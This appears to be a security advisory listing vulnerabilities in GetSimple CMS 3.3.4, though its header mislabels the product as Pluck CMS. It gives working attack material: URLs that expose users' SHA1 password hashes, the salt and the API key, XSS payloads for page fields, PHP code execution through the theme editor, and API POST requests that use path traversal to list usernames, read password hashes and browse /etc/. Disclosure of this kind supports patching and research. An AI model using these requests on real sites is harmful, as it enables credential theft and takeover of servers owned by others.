Pluck CMS:			http://get-simple.info/
Version:			3.3.4
By Ross Marks: 		http://www.rossmarks.co.uk
OSVDB Creditee:		http://osvdb.org/creditees/13991-ross-marks

1.	SHA1 password (and other sensitive information) disclosure
		if you know the name of a user visit either:
			http://website.com/GetSimpleCMS/data/users/<username>.xml <-- password
			http://website.com/GetSimpleCMS/backups/users/<username>.xml.bak <-- password
			http://website.com/GetSimpleCMS/data/other/authorization.xml <-- for salt 
			http://website.com/GetSimpleCMS/data/other/appid.xml <-- API key
			
2.	Persistant XSS (requires access)
		Title, Tags, Menu Text, Meta description are all vulnerable to XSS i.e.
			"><script>alert(1);</script>
		page content is also vulnerable by clicking the source button and editing it directly i.e.
			<script>alert(1)</script>

3.	PHP code execution (requires access)
		Directly type PHP at:		http://website.com/GetSimpleCMS/admin/theme-edit.php
		
4.	Full Path Disclosure
		visit: http://website.com/GetSimpleCMS/plugins/anonymous_data.php to get:
			Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/anonymous_data.php on line 14
		or http://website.com/GetSimpleCMS/plugins/InnovationPlugin.php to get:
			Notice: Use of undefined constant GSDATAOTHERPATH - assumed 'GSDATAOTHERPATH' in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 12

			Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 15

5. API Vulnerabilities
		since you can read the api key it's fairly trivial to exploit the site with this.
		here are some examples (all POST data) to: http://website.com/GetSimpleCMS/admin/api.php
		
	1.	Discover usernames:
			data=<request>
				<key>ABC123456</key>
				<method>all_files_read</method>
				<data>
					<path>../../data/users/</path>
				</data>
			</request>
	
	2. Read user settings file (includes password hash)
			data=<request>
				<key>ABC123456</key>
				<method>page_read</method>
				<data>
					<slug>../../data/users/!!USERNAME!!</slug>
				</data>
			</request>
	
	3. Local file inclusion
			data=<request>
				<key>ABC123456</key>
				<method>all_files_read</method>
				<data>
					<path>../../../../../../etc/</path>
				</data>
			</request>